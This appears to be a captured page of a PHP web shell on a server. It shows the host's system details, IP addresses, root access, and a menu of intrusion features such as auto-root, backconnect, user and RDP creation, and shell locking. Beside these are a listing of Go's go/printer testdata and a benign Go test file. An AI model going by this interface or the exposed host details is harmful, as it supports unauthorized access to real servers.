Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
go /
src /
go /
printer /
testdata /
[ HOME SHELL ]
Name
Size
Permission
Action
alignment.golden
4.12
KB
-rw-r--r--
alignment.input
4.92
KB
-rw-r--r--
comments.golden
11.12
KB
-rw-r--r--
comments.input
11.16
KB
-rw-r--r--
comments.x
1.22
KB
-rw-r--r--
comments2.golden
2.25
KB
-rw-r--r--
comments2.input
2.29
KB
-rw-r--r--
complit.input
912
B
-rw-r--r--
complit.x
1.14
KB
-rw-r--r--
declarations.golden
16.23
KB
-rw-r--r--
declarations.input
16.46
KB
-rw-r--r--
empty.golden
94
B
-rw-r--r--
empty.input
94
B
-rw-r--r--
expressions.golden
12.41
KB
-rw-r--r--
expressions.input
12.13
KB
-rw-r--r--
expressions.raw
12.38
KB
-rw-r--r--
linebreaks.golden
5.09
KB
-rw-r--r--
linebreaks.input
5.07
KB
-rw-r--r--
parser.go
50.69
KB
-rw-r--r--
slow.golden
2.02
KB
-rw-r--r--
slow.input
1.94
KB
-rw-r--r--
statements.golden
8.04
KB
-rw-r--r--
statements.input
8.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.x
// This is a package for testing comment placement by go/printer. // package main // The SZ struct; it is empty. type SZ struct{} // The S0 struct; no field is exported. type S0 struct { // contains filtered or unexported fields } // The S1 struct; some fields are not exported. type S1 struct { S0 A, B, C float // 3 exported fields D int // 2 unexported fields // contains filtered or unexported fields } // The S2 struct; all fields are exported. type S2 struct { S1 A, B, C float // 3 exported fields } // The IZ interface; it is empty. type SZ interface{} // The I0 interface; no method is exported. type I0 interface { // contains filtered or unexported methods } // The I1 interface; some methods are not exported. type I1 interface { I0 F(x float) float // exported methods // contains filtered or unexported methods } // The I2 interface; all methods are exported. type I2 interface { I0 F(x float) float // exported method G(x float) float // exported method } // The S3 struct; all comments except for the last one must appear in the export. type S3 struct { // lead comment for F1 F1 int // line comment for F1 // lead comment for F2 F2 int // line comment for F2 // contains filtered or unexported fields }
Close